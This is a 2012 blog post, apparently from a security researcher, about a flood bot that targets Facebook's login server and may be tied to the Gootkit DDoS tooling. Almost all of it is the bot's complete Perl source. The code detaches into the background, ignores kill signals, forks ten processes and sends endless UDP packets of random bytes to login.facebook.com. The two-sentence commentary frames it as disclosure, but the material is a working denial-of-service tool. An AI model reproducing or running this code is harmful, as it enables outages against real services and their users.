Wednesday, March 7, 2012

Facebook flood bots

Together with the flood bots that I noticed and wrote about in a previews post, there was a flood bot specifically created to target facebook logins. From the coding style and some similarities it looks like it’s written from the same people that created ‘Gootkit ddos system’.

 

The code,

#!/usr/bin/perl

use Fcntl qw(:flock :DEFAULT); 
use Socket;

use IO::Socket;

use IO::Select;


print "Content-type: text/plain\n\n";
print "Decepticons ahead!";

# Set target parameters

my $targetHost = "login.facebook.com";
my $targetPort = "80";
my $targetPacketSize = "1024";
my $threads     = 10;

############################################

 

my $os = $^O;
my $child = undef;

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
#$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

my $pid=fork;

if ($pid) {
#       print "kill parent $$\n";
        exit;
}

main ();


sub main {
        my $arg = $_[0];
        if ($arg eq "iamchild"){
                udpflooder($targetHost, $targetPort, $targetPacketSize);
                exit;
        }
        else {
                for (my $i=0; $i<$threads; $i++)
                {
                        $thread = fork;
                        if ($thread == 0){      #child
                                main("iamchild");
                        }
                        else {  #parent
                                next;
                        }
                }
        }
}
#udpflooder($targetHost, $targetPort, $targetPacketSize);
sub genGarbage {

        my $len = $_[0];
        my $chars = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+|\=-~`1234567890";
        my $garbage = '';

        for my $i (0..$len){
                my $symbol = substr $chars, int rand length($chars), 1;
                $garbage .= $symbol;
        }
        return $garbage;

}

 

sub udpflooder {

        $child = fork;

        if ($child == 0){

                my $iaddr = inet_aton($_[0]);  
                my $host = $_[0];
                my $porta = $_[1];
                my $packetSize = $_[2];
                my $msg = genGarbage($packetSize);
                my $socketUdp;

                socket($socketUdp, PF_INET, SOCK_DGRAM, getprotobyname('udp')) or return(undef);

                while (1)
                {
                        send($socketUdp, $msg, 0, sockaddr_in($porta, $iaddr));
                }
        }
        else {
                exit;
        }
}

No comments:

Post a Comment